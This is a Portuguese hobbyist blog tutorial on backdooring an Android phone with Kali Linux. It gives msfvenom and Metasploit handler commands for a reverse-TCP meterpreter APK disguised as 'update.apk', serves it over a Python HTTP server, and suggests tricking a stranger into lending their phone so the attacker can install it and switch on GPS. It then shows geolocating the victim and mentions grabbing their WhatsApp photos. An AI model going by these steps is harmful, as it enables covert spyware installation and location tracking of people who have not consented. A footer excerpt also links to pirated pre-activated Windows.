Pular para o conteúdo principal

Hackeando android com kali usando msfvenom

Olá humanos resolvi voltar brincar kali esses dias, ver algo legal com o android, fiquei pensando que poderia testar algumas coisas no android com kali, tipo pegar geolocalização e saber onde a pessoa tá, saber das fotos de zapzap da vida coisas assim, pser cheguei nesse nivel de brincar.
/ AVISO ANTES DE CONTINUAR ESTE TUTORIAL, É PARA FINS DIDATICOS E EDUCATIVOS ! OS USO DESDA INFORMAÇÃO PARA FINS DISTINTOS DOS QUAIS CITADOS A CIMA DEVE SER DE TOTAL RESPONSABILIDADE DO LEITOR. PS: Não nos responsabilizamos pelos males cometidos por terceiros. CONTUDO, BOM ESTUDO CARO LEITOR !.

Neste lab vamos usar:

1 - notebook (com kali linux)
1 - celular android(meu é um galaxy s4) // sim bem velho rsrsrsr
1 - tempo uns (20 minutos) // rsrsrsr

Bah guris e gurias, primeiro passo é estar conectado na mesma rede pois vamos usar um ataque chamado MITM, para saber mais clique em cima de MITM. Em resulmo esse ataque pode ser feito usando uma rede local, porem não é muito dificil fazer usando a rede WAN.

Antes de qualquer coisas por ordem, criei uma rede de pasta dessa forma.

root@leaozinho:~/.pentest# ls virus/
android  windows
root@leaozinho:~/.pentest# ls virus/android/
update.apk
root@leaozinho:~/.pentest#






Bom agora precisamos rodar o comando


root@leaozinho:~/.pentest/virus/android# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.15 lport=6666 R > update.apk
 
Bom agora devemos ter um arquivo chamado update.apk, temos nosso backdoor tZ guri auahuahauhauahuh, agora vanos deixar em uma aba no terminal do msfconsole vamos rodar

your progress and findings -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.12.40-dev                         ]
+ -- --=[ 1596 exploits - 912 auxiliary - 274 post        ]
+ -- --=[ 458 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.15
lhost => 192.168.0.15
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.0.15:6666
[*] Starting the payload handler...

+ Nesse momento vamos abrir outra aba de terminal para criar um server python para pegar esse arquivo nessa pasta /.pentest/virus/android/update.apk , nada muito complexo basta abrir um comando na pasta e rodar o seguinte comando.

root@leaozinho:~/.pentest/virus/android# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...


Com isso abra seu navegador na tela do seu celular conectado na rede e acesso o link, no meu caso o ip é o 192.168.0.15, como o server http python roda na porta 8000, basta digitar no navegador.



EX: http://192.168.0.15:800



basta abrir esse link e fazer o download do arquivo apk para dentro de algum celular na rede. Segue o exemplo da engenharia social da rede rsrsrr

"Tio me empresta seu celular perdi o meu é estou sem a chave de casa, me empresta o seu ?" - dica quando estiver com o celular em mãos, ative gps so por zuoas mesmo auhauhauhauh

Bum  !!!! vc baixa e xazam !!!! veja !!!

quando voltar pra tela do msfconsole veja que ela vai estar mais ou menos assim



Vai abrir uma tela de session no meterpreter auhauahuah xazammm !!!! vc ta dentro !!!

Para ter acesso as coordenadas do GPS, basta digitar geolocate

meterpreter > geolocate
[*] Current Location:
    Latitude: 0.00000000
    Longitude: 0.0000000

To get the address: https://maps.googleapis.com/maps/api/geocode/json?latlng=0.0000000,0.00000000&sensor=true


Bom para ter mais informações basta digitar help é ler a documentação dele, espero que tenha gostado >/////< bjks e até a proxima...
/ AVISO ANTES DE CONTINUAR ESTE TUTORIAL, É PARA FINS DIDATICOS E EDUCATIVOS ! OS USO DESDA INFORMAÇÃO PARA FINS DISTINTOS DOS QUAIS CITADOS A CIMA DEVE SER DE TOTAL RESPONSABILIDADE DO LEITOR. PS: Não nos responsabilizamos pelos males cometidos por terceiros. CONTUDO, BOM ESTUDO CARO LEITOR !.

Comentários

Postagens mais visitadas deste blog

Introdução ao Intel Edison: First Hello Word in Intel Edison

Introdução ao Intel Edison Olá Humanos hoje descidi que iria fazer um post sobre Intel Edison é mostrar um blink/HelloWord usando essa plataforma incrivel ^_^, sabe ? antes de codarmos em si, vamos ver 2 pontos simples, Software e Hardware. Software O.S: primeiro ! ele não usa um OS, ele usa uma build para construir OS, um projeto chamado Yoct, oque ser build ? Pense em um pacote para construir um sistema é pronto ^_^, simples porem tem uma documentação e um pacote completo no link https://www.yoctoproject.org/ Bibliotecas: Inicialmente trabalhamos com a libmraa, fornece uma PWM, GPIO, ADC, e outras interfaces para acesso mais baixo a componentes complexos como sensores e coisas legais. OBS: usamos API python para trabalhar com ela Hardware  Essa e intel Brekout o Edison é apenas o ship pegueno no canto esquerdo da imagem, uma arquitetura baseada no arduino porem com processador e uma microproscessador, bom basicamente é isso, porem o que chama atenção é que ele e um co...

Redirecionamento de Porta usando ngrok (Port Forward with ngrok) SSH

Olá Humanos, estou no pensionato e aqui não tenho acesso ao roteador para fazer um redirencionamento de porta digno affs ¬__¬, sim pensei em Hackear rsrsrs, porem minha preguiça minha preguiça não deixa hauhauha, então encontrei uma ferramenta bem legal chamada ngrok que faz com que eu possa acessar remotamente meu servidor local para brincar com IoT. Instalação e ngrok  link: https://ngrok.com/ Para se cadastrar é bem simples basta logar com conta sua conta do git ou google depois faça download e na https://dashboard.ngrok.com/auth na aba auth pegue seu authtoken e valide no terminal # unzip ngrok-stable-linux-amd64.zip # ./ngrok authtoken <YOUR AUTHTOKEN> Instalando SSH no seu computador  Bom se você usa Ubuntu basta rodar  comando  # apt-get install openssh-server Para testar se o serviço digite  # service ssh status Iniciando SSH no Ngrok Rode o ngrok em protocolo tcp na porta 22  # ./ngrok tcp 22 ...

Dicas rápidas !!!!!

Olá Humanos HOJE vamos aprender a criar um pendrive de boot com windows 7 tipo assim mt mt mt mt mt rapido #NoobAlert Requisitos: 1 - Pendrive de 4GB 1 - PC Windows 7 1 - Internet 1 - Cafe 1º Download ISO windows All-in-on  faça  o download do iso pelo site do Windows 7 All in on, se você não sabe usar o torrent acesse a  esta pagina https://kickass.to/windows-7-all-in-one-pre-activated-excellent-t7661549.html 2º Download do  A Bootable USB  http://www.baixaki.com.br/download/a-bootable-usb.htm OK com o download do arquivo BootableUSB.zip  extraia usando sua ferramente de extração, e acessando a pasta basta executar, abrindo a tela igual a de cima. Clique em  3º Criando Pendrive de Boot Seguindo a sequencia de passo 1 - Clique em Check USB para checar se em realmente um pendrive ali(por favor esteja ja com seu pendrive na porta usb neh) 2 - Clique em Format USB(Sera formatado seu pendrive então e bom que tenha um bkp)...